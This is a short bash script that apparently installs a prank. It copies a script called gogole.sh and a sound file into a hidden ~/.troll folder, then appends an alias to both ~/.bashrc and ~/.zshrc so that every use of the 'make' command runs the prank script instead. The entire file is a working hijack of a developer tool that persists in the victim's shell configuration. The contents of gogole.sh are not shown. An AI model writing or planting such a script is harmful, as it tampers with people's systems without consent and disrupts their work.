#!/bin/bash

mkdir ~/.troll
cp gogole.sh ~/.troll
cp son.wav ~/.troll
echo "alias make='~/.troll/gogole.sh'" >> ~/.bashrc
source ~/.bashrc
echo "alias make='~/.troll/gogole.sh'" >> ~/.zshrc
source ~/.zshrc
#rm infinit_add
